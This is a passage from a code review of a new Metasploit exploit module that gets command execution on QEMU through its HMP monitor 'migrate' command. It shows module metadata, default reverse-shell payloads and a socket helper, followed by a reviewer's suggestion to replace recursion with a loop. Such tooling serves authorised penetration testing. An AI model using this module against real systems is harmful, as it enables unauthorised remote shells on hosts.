modules/exploits/multi/misc/qemu_monitor_hmp_migrate_cmd_exec.rb

```diff
@@ -0,0 +1,119 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+
+  include Msf::Exploit::Remote::Tcp
+  include Msf::Exploit::CmdStager
+  include Msf::Exploit::FileDropper
+  prepend Msf::Exploit::Remote::AutoCheck
+
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name' => "QEMU Monitor HMP 'migrate' Command Execution",
+        'Description' => %q{
+          This module uses QEMU's Monitor Human Monitor Interface (HMP)
+          TCP server to execute system commands using the `migrate` command.
+
+          This module has been tested successfully on QEMU version 6.2.0
+          on Ubuntu 20.04.
+        },
+        'License' => MSF_LICENSE,
+        'Author' => ['bcoles'],
+        'References' => [
+          ['URL', 'https://wiki.qemu.org/ToDo/HMP'],
+          ['URL', 'https://www.qemu.org/docs/master/system/monitor.html'],
+          ['URL', 'https://www.qemu.org/docs/master/system/security.html'],
+          ['URL', 'https://www.linux-kvm.org/page/Migration'],
+        ],
+        'Arch' => [ ARCH_CMD, ARCH_AARCH64, ARCH_ARMLE, ARCH_X86, ARCH_X64 ],
+        'Platform' => %w[unix linux],
+        'Payload' => {
+          'DisableNops' => true,
+          'BadChars' => "\x00\x0a\x0d\x22",
+          'Space' => 1010
+        },
+        'Targets' => [
+          [
+            'Unix (Command)',
+            {
+              'Platform' => 'unix',
+              'Arch' => ARCH_CMD,
+              'DefaultOptions' => { 'PAYLOAD' => 'cmd/unix/reverse' },
+              'Type' => :unix_cmd
+            }
+          ],
+          [
+            'Linux (Dropper)',
+            {
+              'Platform' => 'linux',
+              'DefaultOptions' => {
+                'PAYLOAD' => 'linux/x86/meterpreter/reverse_tcp',
+                'PrependFork' => true,
+                'MeterpreterTryToFork' => true
+              },
+              'Type' => :linux_dropper
+            }
+          ]
+        ],
+        'Notes' => {
+          'Stability' => [CRASH_SAFE],
+          'Reliability' => [REPEATABLE_SESSION],
+          'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK]
+        },
+        'Privileged' => false,
+        'DisclosureDate' => '2011-12-02'
+      )
+    )
+  end
+
+  def read_until_prompt
+    res = sock.get_once
+    return if res.nil?
+    return if res.to_s.include?('(qemu)')
+
+    ::Timeout.timeout(10) do
+      read_until_prompt
+    end
```

Comment:
Can avoid the unnecessary recursion here. Since it's from a socket reading data we don't control, the possibility a stack overflow is slightly concerning.

```suggestion
    ::Timeout.timeout(10) do
      loop do
        res = sock.get_once
        break if res.nil?
        break if res.to_s.include?('(qemu)')
      end
    end
```

Reply:
fixed